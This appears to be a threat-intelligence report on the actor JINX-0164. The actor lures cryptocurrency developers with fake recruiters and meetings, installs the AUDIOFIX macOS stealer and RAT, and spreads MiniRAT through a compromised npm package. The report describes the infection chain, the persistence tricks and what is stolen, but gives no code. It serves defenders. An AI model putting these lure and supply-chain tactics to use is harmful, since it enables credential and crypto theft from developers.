JINX-0164 Threat Actor

A previously undocumented threat actor identified as JINX-0164 has orchestrated a highly targeted cyber campaign against cryptocurrency organizations, using recruitment-themed social engineering and custom-built macOS malware to steal digital assets. Active since at least mid-2025, the financially motivated group has focused heavily on developers and, in at least one confirmed incident, executed a software supply chain compromise.

The campaign demonstrates an advanced combination of deceptive recruitment tactics, malware deployment, and deep infiltration of CI/CD environments. By compromising employee workstations, the attackers successfully moved laterally into development infrastructure and code distribution systems, significantly increasing the scope and impact of the intrusions.

Recruitment Scams Become the Entry Point

JINX-0164 relies on convincing LinkedIn personas to initiate contact with targeted developers and employees working within cryptocurrency-related organizations. Victims are invited to participate in virtual meetings hosted on fraudulent domains impersonating legitimate teleconferencing platforms.

During the fake meeting setup process, targets are instructed to download what appears to be a meeting client or technical fix. In reality, the downloaded file initiates the infection chain by retrieving a Python-based macOS infostealer and remote access trojan known as AUDIOFIX from a spoofed driver distribution domain, 'apple.driver-store.com.'

The infection process is facilitated through a bash script capable of identifying the victim’s system architecture, allowing the malware to operate seamlessly on both Intel-based and Apple Silicon macOS devices. The payload disguises itself as a system audio driver named 'coreaudiod,' is stored locally as 'ChromeUpdater,' and is launched using macOS launchctl mechanisms to maintain persistence.

AUDIOFIX Enables Deep System Compromise

Once deployed, AUDIOFIX performs extensive credential theft and reconnaissance operations while also supporting lateral movement into internal infrastructure. Researchers observed the malware being used to inject malicious payloads into development systems and modify source code in attempts to compromise additional endpoints and harvest cryptocurrency wallet credentials.

The malware is capable of stealing a broad range of sensitive information, including:

• Password manager credentials, browser data, iCloud Keychain files, SSH keys, administrator credentials, console history records, and configuration files
• Cryptocurrency wallet addresses, browser extension data linked to crypto services, and active sessions from Discord, Slack, and Telegram

Beyond information theft, AUDIOFIX also supports remote command execution, file deletion, payload delivery, reconnaissance activities, and data exfiltration from infected systems.

MiniRAT Expands the Threat Through Supply Chain Abuse

Another major component of the operation is MiniRAT, a Go-based backdoor tied to a compromised npm package named '@velora-dex/sdk.' The package was associated with a legitimate decentralized finance toolkit used for token swaps, delta trading, and limit orders on the VeloraDEX platform.

The malicious version of the package retrieved a shell script from a remote server, ultimately deploying a macOS-specific MiniRAT binary. Once installed, the malware enabled attackers to upload files, execute arbitrary shell commands, and download additional payloads from attacker-controlled infrastructure.

JINX-0164 has repeatedly reused social engineering tactics involving fake recruitment opportunities and fabricated technical problems requiring victims to install fraudulent software fixes. This consistent methodology highlights the group’s strong emphasis on human manipulation as a primary intrusion vector.

Possible Links to North Korean Cyber Operations

Several characteristics of the campaign resemble activity previously associated with North Korean cyber threat groups such as BlueNoroff, Contagious Interview, and UNC1069. Researchers noted similarities in targeting patterns, spoofed domains, and the use of VPN services such as Astrill VPN.

Despite these overlaps, investigators have not identified any confirmed infrastructure connections linking JINX-0164 directly to North Korean state-sponsored operations. Current evidence suggests operational similarities rather than definitive attribution.